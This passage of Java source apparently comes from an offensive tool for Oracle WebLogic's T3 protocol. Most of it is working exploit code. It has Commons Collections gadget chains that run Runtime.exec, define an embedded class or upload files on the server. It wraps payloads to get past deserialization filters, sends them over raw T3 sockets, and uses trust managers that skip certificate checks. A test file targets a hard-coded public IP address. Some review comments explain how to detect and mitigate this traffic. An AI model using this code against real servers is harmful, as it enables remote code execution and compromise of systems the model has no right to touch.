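            int low = charToByte(hexChars[2 * i + 1]);
            if (high < 0 || low < 0) {
                throw new IllegalArgumentException("invalid hex character near offset " + (2 * i));
            }
            decoded[i] = (byte) (high << 4 | low);
        }
        return decoded;
    }

    /** Returns the nibble value of an upper-case hex digit, or -1 when {@code c} is not one. */
    private static byte charToByte(char c) {
        return (byte) HEX_DIGITS.indexOf(c);
    }

    /**
     * Concatenates two arrays into a new one.
     *
     * @return a new array holding {@code byte_1} followed by {@code byte_2}
     * @throws NullPointerException when either argument is null
     */
    public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
        byte[] byte_3 = new byte[byte_1.length + byte_2.length];
        System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
        System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
        return byte_3;
    }

    /**
     * Encodes bytes as lower-case hex, two characters per byte.
     *
     * @return the hex text, or {@code null} when {@code src} is null or empty
     */
    public static String bytesToHexString(byte[] src) {
        if (src == null || src.length <= 0) {
            return null;
        }
        StringBuilder stringBuilder = new StringBuilder(src.length * 2);
        for (int i = 0; i < src.length; i++) {
            int v = src[i] & 0xFF;
            String hv = Integer.toHexString(v);
            if (hv.length() < 2) {
                // Integer.toHexString drops the leading zero of values below 0x10.
                stringBuilder.append(0);
            }
            stringBuilder.append(hv);
        }
        return stringBuilder.toString();
    }

    /**
     * Reads a whole file into memory.
     *
     * <p>The file is read in a loop until end of stream, so a short read cannot truncate the
     * result, an empty file yields an empty array instead of a NegativeArraySizeException, and
     * no fixed 50 MB buffer is allocated. The stream is closed even when reading fails.
     *
     * @param FilePath path of the file to read
     * @return the file content
     * @throws Exception when the file cannot be opened or read
     */
    public static byte[] GetByteByFile(String FilePath) throws Exception {
        FileInputStream fi = new FileInputStream(FilePath);
        try {
            java.io.ByteArrayOutputStream collected = new java.io.ByteArrayOutputStream();
            byte[] chunk = new byte[8192];
            int count;
            while ((count = fi.read(chunk)) != -1) {
                collected.write(chunk, 0, count);
            }
            return collected.toByteArray();
        } finally {
            fi.close();
        }
    }

    /** Developer helper: prints the hex form of a JAR at a hard-coded local path. */
    public static void main(String[] args) throws Exception {
        System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar")));
    }
}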
================================================
FILE: src/com/supeream/serial/Reflections.java
================================================
package com.supeream.serial;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
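/**
 * Small reflection helpers that look members up by name and make them accessible.
 */
public class Reflections {
    /**
     * Finds a declared field by name on {@code clazz} or the nearest superclass that declares it,
     * and makes it accessible.
     *
     * <p>{@code Class.getDeclaredField} never returns null; it throws NoSuchFieldException. The
     * superclass fallback therefore has to be driven by that exception, otherwise inherited
     * fields are never found.
     *
     * @param clazz     class where the search starts
     * @param fieldName name of the field
     * @return the accessible field
     * @throws NoSuchFieldException when no class in the hierarchy declares the field
     */
    public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
        Class<?> current = clazz;
        while (current != null) {
            try {
                final Field field = current.getDeclaredField(fieldName);
                field.setAccessible(true);
                return field;
            } catch (NoSuchFieldException notDeclaredHere) {
                current = current.getSuperclass();
            }
        }
        throw new NoSuchFieldException(fieldName);
    }

    /** Sets the named field of {@code obj} (declared or inherited) to {@code value}. */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /** Returns the current value of the named field of {@code obj} (declared or inherited). */
    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        return field.get(obj);
    }

    /**
     * Returns element 0 of {@code getDeclaredConstructors()} for the named class, made accessible.
     * The order of that array is not specified by the Java API, so "first" is only well defined
     * for classes that declare a single constructor.
     *
     * @param name fully qualified class name, resolved with {@code Class.forName}
     */
    public static Constructor<?> getFirstCtor(final String name) throws Exception {
        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        return ctor;
    }
}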
================================================
FILE: src/com/supeream/serial/SerialDataGenerator.java
================================================
package com.supeream.serial;
import com.supeream.weblogic.BypassPayloadSelector;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.mozilla.classfile.DefiningClassLoader;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
/**
* Created by nike on 17/7/3.
*/
public class SerialDataGenerator {
private static final String REMOTE = "com.supeream.payload.RemoteImpl";
private static final String remoteHex = "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";
private static byte[] serialData(Transformer[] transformers) throws Exception {
final Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
// 初始化map 设置laymap
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
InvocationHandler handler = (InvocationHandler) Reflections
.getFirstCtor(
"sun.reflect.annotation.AnnotationInvocationHandler")
.newInstance(Override.class, lazyMap);
final Map mapProxy = Map.class
.cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(),
new Class[]{Map.class}, handler));
handler = (InvocationHandler) Reflections.getFirstCtor(
"sun.reflect.annotation.AnnotationInvocationHandler")
.newInstance(Override.class, mapProxy);
Object _handler = BypassPayloadSelector.selectBypass(handler);
return Serializables.serialize(_handler);
}
private static Transformer[] defineAndLoadPayloadTransformerChain(String className, byte[] clsData, String[] bootArgs) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(DefiningClassLoader.class),
new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
new InvokerTransformer("defineClass",
new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{bootArgs}}),
new ConstantTransformer(new HashSet())};
return transformers;
}
private static Transformer[] uploadTransformerChain(String className, byte[] clsData, String filePath, byte[] content) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(DefiningClassLoader.class),
new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
new InvokerTransformer("defineClass",
new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"uploadFile", new Class[]{String.class, byte[].class}}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{filePath, content}}),
new ConstantTransformer(new HashSet())};
return transformers;
}
/**
 * Builds a transformer array that reflectively resolves {@code Runtime.getRuntime()},
 * invokes it, and calls {@code exec(String[])} on the result with {@code execArgs}.
 * The last element replaces the result with an empty HashSet.
 *
 * Review note (defensive): this is the widely documented Runtime.exec form of the
 * InvokerTransformer gadget. On the receiving side it shows up as a child process of
 * the Java server process, which is a practical detection point alongside
 * deserialization filtering.
 *
 * @param execArgs argument vector passed to Runtime.exec
 * @return the transformer array; the order of its elements is significant
 */
private static Transformer[] blindExecutePayloadTransformerChain(String[] execArgs) throws Exception {
    Transformer[] transformers = new Transformer[]{
            // start value: the Runtime class object
            new ConstantTransformer(Runtime.class),
            // Runtime.class.getMethod("getRuntime")
            new InvokerTransformer("getMethod", new Class[]{
                    String.class, Class[].class}, new Object[]{
                    "getRuntime", new Class[0]}),
            // invoke the static method with no arguments
            new InvokerTransformer("invoke", new Class[]{
                    Object.class, Object[].class}, new Object[]{
                    null, new Object[0]}),
            // runtime.exec(execArgs)
            new InvokerTransformer("exec",
                    new Class[]{String[].class}, new Object[]{execArgs}),
            // final value of the chain is a plain empty HashSet
            new ConstantTransformer(new HashSet())};
    return transformers;
}
/**
 * Serializes the class-defining chain for the embedded class
 * (SerialDataGenerator.REMOTE / SerialDataGenerator.remoteHex) with the given boot arguments.
 *
 * @param bootArgs arguments forwarded to the chain builder
 * @return the bytes produced by serialData for that chain
 */
public static byte[] serialRmiDatas(String[] bootArgs) throws Exception {
    final String remoteClassName = SerialDataGenerator.REMOTE;
    final byte[] remoteClassBytes = BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex);
    final Transformer[] chain = defineAndLoadPayloadTransformerChain(remoteClassName, remoteClassBytes, bootArgs);
    return serialData(chain);
}
/**
 * Serializes the chain built by blindExecutePayloadTransformerChain for {@code execArgs}.
 *
 * @param execArgs argument vector forwarded to the chain builder
 * @return the bytes produced by serialData for that chain
 */
public static byte[] serialBlindDatas(String[] execArgs) throws Exception {
    final Transformer[] chain = blindExecutePayloadTransformerChain(execArgs);
    return serialData(chain);
}
/**
 * Serializes the upload chain for the embedded class
 * (SerialDataGenerator.REMOTE / SerialDataGenerator.remoteHex) with the given path and content.
 *
 * @param filePath path argument forwarded to the chain builder
 * @param content  byte content forwarded to the chain builder
 * @return the bytes produced by serialData for that chain
 */
public static byte[] serialUploadDatas(String filePath, byte[] content) throws Exception {
    final String remoteClassName = SerialDataGenerator.REMOTE;
    final byte[] remoteClassBytes = BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex);
    final Transformer[] chain = uploadTransformerChain(remoteClassName, remoteClassBytes, filePath, content);
    return serialData(chain);
}
}
================================================
FILE: src/com/supeream/serial/Serializables.java
================================================
package com.supeream.serial;
import java.io.*;
public class Serializables {
public static byte[] serialize(final Object obj) throws IOException {
final ByteArrayOutputStream out = new ByteArrayOutputStream();
serialize(obj, out);
return out.toByteArray();
}
public static void serialize(final Object obj, final OutputStream out) throws IOException {
final ObjectOutputStream objOut = new ObjectOutputStream(out);
objOut.writeObject(obj);
objOut.flush();
objOut.close();
}
public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
return deserialize(in);
}
public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
final ObjectInputStream objIn = new ObjectInputStream(in);
return objIn.readObject();
}
}
================================================
FILE: src/com/supeream/ssl/SocketFactory.java
================================================
package com.supeream.ssl;
import com.supeream.Main;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import java.net.Socket;
import java.security.SecureRandom;
/**
 * Created by nike on 17/6/29.
 *
 * Static factory for the client socket: plain TCP, or an SSL socket when the
 * "https" command-line option is present.
 */
public class SocketFactory {

    /** Not instantiable; only the static factory method is used. */
    private SocketFactory() {
    }

    /**
     * Opens a connected socket to {@code host}:{@code port}.
     *
     * Review note: in the "https" branch the context is initialised with this project's
     * TrustManagerImpl, whose check methods are empty, so the peer certificate is never
     * validated and the channel offers no server authentication. The context is also
     * requested under the legacy protocol name "SSL".
     *
     * @param host remote host name or address
     * @param port remote port
     * @return a connected plain or SSL socket
     */
    public static Socket newSocket(String host, int port) throws Exception {
        if (!Main.cmdLine.hasOption("https")) {
            return new Socket(host, port);
        }
        final SSLContext sslContext = SSLContext.getInstance("SSL");
        // initialise: no key managers, the project's single trust manager, fresh randomness
        final TrustManager[] trustManagers = new TrustManager[]{new TrustManagerImpl()};
        sslContext.init(null, trustManagers, new SecureRandom());
        final SSLSocketFactory sslFactory = sslContext.getSocketFactory();
        return sslFactory.createSocket(host, port);
    }
}
================================================
FILE: src/com/supeream/ssl/TrustManagerImpl.java
================================================
package com.supeream.ssl;
import javax.net.ssl.X509TrustManager;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
/**
* Created by nike on 17/6/29.
*/
public class TrustManagerImpl implements X509TrustManager {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return null;
}
}
================================================
FILE: src/com/supeream/ssl/WeblogicTrustManager.java
================================================
package com.supeream.ssl;
import weblogic.security.SSL.TrustManager;
import java.security.cert.X509Certificate;
/**
 * Created by nike on 17/6/29.
 *
 * Implementation of weblogic.security.SSL.TrustManager whose callback always
 * returns true.
 * NOTE(review): presumably a true return tells the WebLogic client SSL layer to accept
 * the presented chain regardless of validation result — confirm against the WebLogic
 * API documentation. If so, connections using it have no server authentication.
 */
public class WeblogicTrustManager implements TrustManager {
    /**
     * @param x509Certificates certificate chain supplied by the caller (ignored)
     * @param i                integer supplied by the caller (ignored)
     * @return always {@code true}
     */
    @Override
    public boolean certificateCallback(X509Certificate[] x509Certificates, int i) {
        return true;
    }
}
================================================
FILE: src/com/supeream/weblogic/BypassPayloadSelector.java
================================================
package com.supeream.weblogic;
import com.supeream.Main;
import com.supeream.serial.Serializables;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jms.common.StreamMessageImpl;
import java.io.IOException;
/**
 * Created by nike on 17/6/26.
 *
 * Optionally wraps an already-built object in a WebLogic container type before it is
 * serialized; the container is selected by Main.TYPE.
 * NOTE(review): judging by the class name, the wrapping is meant to keep the inner
 * object out of sight of class checks applied to the outer stream — confirm. For
 * defenders this is why a deserialization filter has to cover nested streams
 * (MarshalledObject contents, StreamMessageImpl buffers) and not only the top-level
 * object.
 */
public class BypassPayloadSelector {
    /**
     * Wraps {@code payload} in a weblogic.corba.utils.MarshalledObject.
     *
     * @return the wrapper, or {@code null} if the constructor threw IOException
     */
    private static Object marshalledObject(Object payload) {
        MarshalledObject marshalledObject = null;
        try {
            marshalledObject = new MarshalledObject(payload);
        } catch (IOException e) {
            // NOTE(review): the failure is only printed; the caller then continues with null.
            e.printStackTrace();
        }
        return marshalledObject;
    }

    /**
     * Creates a StreamMessageImpl and installs {@code object} as its data buffer
     * via setDataBuffer(object, object.length).
     *
     * @param object bytes to place in the message buffer; must not be null
     * @return the populated StreamMessageImpl
     */
    public static Object streamMessageImpl(byte[] object) throws Exception {
        StreamMessageImpl streamMessage = new StreamMessageImpl();
        streamMessage.setDataBuffer(object, object.length);
        return streamMessage;
    }

    /**
     * Applies the wrapper named by Main.TYPE (compared case-insensitively):
     * "marshall" uses marshalledObject, "streamMessageImpl" serializes the payload and
     * uses streamMessageImpl; any other value returns {@code payload} unchanged.
     *
     * @param payload object to wrap
     * @return the wrapped object, or the original payload
     */
    public static Object selectBypass(Object payload) throws Exception {
        if (Main.TYPE.equalsIgnoreCase("marshall")) {
            payload = marshalledObject(payload);
        } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
            payload = streamMessageImpl(Serializables.serialize(payload));
        }
        return payload;
    }
}
================================================
FILE: src/com/supeream/weblogic/ObjectTest.java
================================================
package com.supeream.weblogic;
import com.supeream.serial.BytesOperation;
import java.io.*;
/**
 * Created by nike on 17/7/11.
 *
 * Scratch program: writes a UTF string through an ObjectOutputStream, round-trips the
 * bytes through BytesOperation's hex helpers, and reads the result back with an
 * ObjectInputStream.
 */
public class ObjectTest {
    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeUTF("xxx");
        // NOTE(review): the object stream is not flushed before toByteArray(), so the
        // buffered writeUTF data may be missing from the array — confirm this is intended.
        String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray());
        System.out.println(xx);
        byte[] cons = BytesOperation.hexStringToBytes(xx);
        ByteArrayInputStream bis = new ByteArrayInputStream(cons);
        ObjectInputStream objectInputStream = new ObjectInputStream(bis);
        // NOTE(review): the data was written with writeUTF but is read with readObject;
        // the matching read call would be readUTF — confirm which behaviour is being probed.
        objectInputStream.readObject();
    }
}
================================================
FILE: src/com/supeream/weblogic/T3ProtocolOperation.java
================================================
package com.supeream.weblogic;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import com.supeream.Main;
import com.supeream.serial.BytesOperation;
import com.supeream.serial.Serializables;
import com.supeream.ssl.SocketFactory;
import weblogic.rjvm.JVMID;
import weblogic.security.acl.internal.AuthenticatedUser;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.Socket;
public class T3ProtocolOperation {
    /**
     * Connects to {@code host}:{@code port}, sends the textual t3/t3s greeting, reads one
     * response line, then writes a single length-prefixed frame assembled as a hex string:
     * fixed header fields, the caller's {@code payload}, a serialized AuthenticatedUser and
     * two serialized JVMID objects. Each object is preceded by capacityLength and
     * readObjectType bytes.
     *
     * Review note (defensive): the greeting line and the serialized-object frame that
     * follows arrive on the WebLogic listen port. Restricting T3/T3S to trusted sources
     * with WebLogic connection filters, applying vendor patches, and JEP 290
     * deserialization filtering are the mitigations for this class of traffic.
     *
     * @param host    remote host
     * @param port    remote port as a decimal string (parsed with Integer.parseInt)
     * @param payload serialized object bytes placed first in the frame
     */
    public static void send(String host, String port, byte[] payload) throws Exception {
        // NOTE(review): the socket is closed only on the success path (s.close() at the
        // end); an exception anywhere below leaves it open.
        Socket s = SocketFactory.newSocket(host, Integer.parseInt(port));
        // AS = ABBREV_TABLE_SIZE, HL = remoteHeaderLength (used for skipping)
        String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
        if (Main.cmdLine.hasOption("https")) {
            header = "t3s 7.0.0.0\nAS:10\nHL:19\n\n";
        }
        s.getOutputStream().write(header.getBytes());
        s.getOutputStream().flush();
        BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
        // NOTE(review): readLine() returns null if the peer closes without answering;
        // the replace() calls below would then throw NullPointerException.
        String versionInfo = br.readLine();
        if (Main.version == null) {
            // strip the "HELO:" prefix and ".false" suffix to leave the version string
            versionInfo = versionInfo.replace("HELO:", "");
            versionInfo = versionInfo.replace(".false", "");
            System.out.println("weblogic version:" + versionInfo);
            Main.version = versionInfo;
        }
        // String asInfo = br.readLine();
        // String hlInfo = br.readLine();
        // System.out.println(versionInfo+"\n"+asInfo+"\n"+hlInfo);
        //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
        //t3 protocol
        String cmd = "08";
        String qos = "65";
        String flags = "01";
        String responseId = "ffffffff";
        String invokableId = "ffffffff";
        String abbrevOffset = "00000000";
        String countLength = "01";
        String capacityLength = "10";//must be greater than the AS value set above
        String readObjectType = "00";//00 object deserial 01 ascii
        StringBuilder datas = new StringBuilder();
        datas.append(cmd);
        datas.append(qos);
        datas.append(flags);
        datas.append(responseId);
        datas.append(invokableId);
        datas.append(abbrevOffset);
        //because of 2 times deserial
        countLength = "04";
        datas.append(countLength);
        //define execute operation
        String pahse1Str = BytesOperation.bytesToHexString(payload);
        datas.append(capacityLength);
        datas.append(readObjectType);
        datas.append(pahse1Str);
        //for compatiable fo hide
        //for compatiable fo hide
        // NOTE(review): user name and second argument are hard-coded literals; whether the
        // peer evaluates them is not visible from this file.
        AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123");
        String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser));
        datas.append(capacityLength);
        datas.append(readObjectType);
        datas.append(phase4);
        // JVMID built through its non-public (InetAddress, boolean) constructor, with the
        // private "differentiator" field set reflectively
        JVMID src = new JVMID();
        Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
        constructor.setAccessible(true);
        src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
        Field serverName = src.getClass().getDeclaredField("differentiator");
        serverName.setAccessible(true);
        serverName.set(src,1);
        datas.append(capacityLength);
        datas.append(readObjectType);
        datas.append(BytesOperation.bytesToHexString(Serializables.serialize(src)));
        JVMID dst = new JVMID();
        constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
        constructor.setAccessible(true);
        src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
        serverName = src.getClass().getDeclaredField("differentiator");
        serverName.setAccessible(true);
        serverName.set(dst,1);
        datas.append(capacityLength);
        datas.append(readObjectType);
        datas.append(BytesOperation.bytesToHexString(Serializables.serialize(dst)));
        byte[] headers = BytesOperation.hexStringToBytes(datas.toString());
        // frame length = body length plus the 4-byte length field itself,
        // rendered as 8 zero-padded hex digits
        int len = headers.length + 4;
        String hexLen = Integer.toHexString(len);
        StringBuilder dataLen = new StringBuilder();
        if (hexLen.length() < 8) {
            for (int i = 0; i < (8 - hexLen.length()); i++) {
                dataLen.append("0");
            }
        }
        dataLen.append(hexLen);
        s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + datas.toString()));
        s.getOutputStream().flush();
        s.close();
    }
}
================================================
FILE: src/com/supeream/weblogic/T3Test.java
================================================
package com.supeream.weblogic;
import com.supeream.Main;
import com.supeream.payload.RemoteImpl;
import com.supeream.serial.BytesOperation;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
import com.supeream.ssl.SocketFactory;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.DefaultParser;
import org.apache.commons.cli.Options;
import weblogic.apache.org.apache.velocity.runtime.Runtime;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.internal.NamingNode;
import weblogic.protocol.Identity;
import weblogic.rjvm.JVMID;
import weblogic.rmi.cluster.ClusterableRemoteObject;
import weblogic.rmi.cluster.ReplicaAwareRemoteObject;
import weblogic.security.acl.internal.AuthenticatedUser;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingEnumeration;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.Socket;
import java.rmi.Remote;
/**
 * Created by nike on 17/6/28.
 *
 * Scratch program. The first part of main is an earlier raw-socket experiment kept as
 * commented-out code; the active part sets four system properties, obtains a JNDI
 * context over t3s through Main.getInitialContext, prints its environment and lists
 * the class names of the root bindings.
 */
public class T3Test {
    public static void main(String[] args) throws Exception {
        // Options options = new Options();
        // options.addOption("https",false,"xx");
        // CommandLineParser parser = new DefaultParser();
        // Main.cmdLine = parser.parse(options, args);
        //
        // Socket s = SocketFactory.newSocket("77.246.34.226", 443);
        // //AS ABBREV_TABLE_SIZE HL remoteHeaderLength, used for skipping
        // String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
        // s.getOutputStream().write(header.getBytes());
        // s.getOutputStream().flush();
        // BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
        // String versionInfo = br.readLine();
        // String asInfo = br.readLine();
        // String hlInfo = br.readLine();
        //
        // System.out.println(versionInfo + "\n" + asInfo + "\n" + hlInfo);
        //
        // //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
        //
        //
        // //t3 protocol
        // String cmd = "09";
        // String qos = "65";
        // String flags = "01";
        // String responseId = "ffffffff";
        // String invokableId = "ffffffff";
        // String abbrevOffset = "00000022";//16+3=19+4+4+1=28+1+1+5348=5378-4=000014fe 30+8-4
        //
        //
        // String countLength = "02";
        // String capacityLength = "10";//must be greater than the AS value set above
        // String readObjectType = "00";//00 object deserial 01 ascii
        //
        // StringBuilder dataS = new StringBuilder();
        // dataS.append(cmd);
        // dataS.append(qos);
        // dataS.append(flags);
        // dataS.append(responseId);
        // dataS.append(invokableId);
        // dataS.append(abbrevOffset);
        //
        // //RemotePeriodLength
        // dataS.append("00000001");
        // //PublickeySize
        // dataS.append("00000001");
        // System.out.println(Integer.toHexString(115));
        // dataS.append("0001");
        //
        // byte[] phase1 = Serializables.serialize(new File("/etc/passwd"));
        // System.out.println("payloadlength="+(phase1.length));
        // String pahse1Str = BytesOperation.bytesToHexString(phase1);
        // System.out.println("pahse1Str="+pahse1Str);
        // dataS.append(pahse1Str.substring(8));
        //
        // countLength = "04";
        // dataS.append(countLength);
        //
        //
        // //define IRemote.class class by byte[]
        //// byte[] phase1 = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
        //// String pahse1Str = BytesOperation.bytesToHexString(phase1);
        //// datas.append(capacityLength);
        //// datas.append(readObjectType);
        //// datas.append(pahse1Str);
        //
        //
        //
        // //for compatiable fo hide
        // Class x = Class.forName("weblogic.rjvm.ClassTableEntry");
        //
        // Class xxf = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        // ObjectStreamClass objectStreamClass = ObjectStreamClass.lookup(xxf);
        // Constructor f = x.getDeclaredConstructor(ObjectStreamClass.class, String.class);
        //
        // f.setAccessible(true);
        // Object xx = f.newInstance(objectStreamClass,"");
        //
        // String phase41 = BytesOperation.bytesToHexString(Serializables.serialize(xx));
        // dataS.append(capacityLength);
        // dataS.append(readObjectType);
        // dataS.append(phase41);
        //
        //
        // //for compatiable fo hide
        // AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123");
        // String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser));
        // dataS.append(capacityLength);
        // dataS.append(readObjectType);
        // dataS.append(phase4);
        //
        // JVMID dst = new JVMID();
        //
        // Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
        // constructor.setAccessible(true);
        // dst = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
        // Field serverName = dst.getClass().getDeclaredField("differentiator");
        // serverName.setAccessible(true);
        // serverName.set(dst,0);
        //
        // serverName = dst.getClass().getDeclaredField("transientIdentity");
        // serverName.setAccessible(true);
        // serverName.set(dst,new Identity(1000l));
        //
        // dataS.append(capacityLength);
        // dataS.append(readObjectType);
        // dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(dst)));
        //
        // JVMID src = new JVMID();
        //
        // constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
        // constructor.setAccessible(true);
        // src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
        // serverName = src.getClass().getDeclaredField("differentiator");
        // serverName.setAccessible(true);
        // serverName.set(dst,0);
        //
        // serverName = src.getClass().getDeclaredField("transientIdentity");
        // serverName.setAccessible(true);
        // serverName.set(src,new Identity(1000l));
        //
        // dataS.append(capacityLength);
        // dataS.append(readObjectType);
        // dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(src)));
        //
        //
        //
        //// RemotePeriodLength
        // int remotePeriodLength = Integer.MAX_VALUE;
        // ByteArrayOutputStream bos = new ByteArrayOutputStream();
        // DataOutputStream dos = new DataOutputStream(bos);
        // dos.writeInt(remotePeriodLength);
        // dos.flush();
        // dos.close();
        // System.out.println(BytesOperation.bytesToHexString(bos.toByteArray()));
        //
        // System.out.println(dataS.toString());
        //
        // byte[] headers = BytesOperation.hexStringToBytes(dataS.toString());
        //
        //
        // int len = headers.length + 4;
        // String hexLen = Integer.toHexString(len);
        //
        // StringBuilder dataLen = new StringBuilder();
        // if (hexLen.length() < 8) {
        // for (int i = 0; i < (8 - hexLen.length()); i++) {
        // dataLen.append("0");
        // }
        // }
        //
        // dataLen.append(hexLen);
        // System.out.println("length="+dataLen);
        //
        // s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + dataS.toString()));
        // s.getOutputStream().flush();
        //
        // System.out.println("result="+br.readLine());
        // s.close();

        // Active code starts here: JVM-wide properties set before the JNDI lookup.
        System.setProperty("weblogic.rjvm.enableprotocolswitch","true");
        System.setProperty("UseSunHttpHandler","true");
        System.setProperty("ssl.SocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl");
        System.setProperty("ssl.ServerSocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl");
        // NOTE(review): the endpoint is a hard-coded literal address and port; take it
        // from arguments or configuration rather than committing it to the source.
        Context initialContext = Main.getInitialContext("t3s://" + "77.246.34.226" + ":" + 443);
        // Context initialContext = Main.getInitialContext("t3://" + "10.211.55.5" + ":" + 7001);
        // NamingNode remote = (NamingNode) initialContext.lookup("weblogic");
        // System.out.println(remote.toString());
        // System.out.println(initialContext.);
        System.out.println(initialContext.getEnvironment());
        // print the runtime class of each entry returned for the root context
        NamingEnumeration namingEnumeration = initialContext.list("");
        while (namingEnumeration.hasMoreElements()) {
            System.out.println(namingEnumeration.next().getClass().getName());
        }
        // weblogic.jndi.internal.WLContextImpl serverNamingNode = (weblogic.jndi.internal.WLContextImpl) initialContext.lookup("weblogic");
    }
}
================================================
FILE: src/com/supeream/weblogic/WebLogicOperation.java
================================================
package com.supeream.weblogic;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import com.supeream.Main;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
/**
 * Entry points that pair a serialized object from SerialDataGenerator with
 * T3ProtocolOperation.send for a given host and port.
 */
public class WebLogicOperation {

    /** Sends the serialRmiDatas object built with the single argument "install". */
    public static void installRmi(String host, String port) throws Exception {
        final String[] bootArgs = new String[]{"install"};
        T3ProtocolOperation.send(host, port, SerialDataGenerator.serialRmiDatas(bootArgs));
    }

    /** Sends the serialRmiDatas object built with the single argument "uninstall". */
    public static void unInstallRmi(String host, String port) throws Exception {
        final String[] bootArgs = new String[]{"uninstall"};
        T3ProtocolOperation.send(host, port, SerialDataGenerator.serialRmiDatas(bootArgs));
    }

    /** Sends the serialRmiDatas object built with "blind" and the value of option "C". */
    public static void blind(String host, String port) throws Exception {
        final String optionC = Main.cmdLine.getOptionValue("C");
        final String[] bootArgs = new String[]{"blind", optionC};
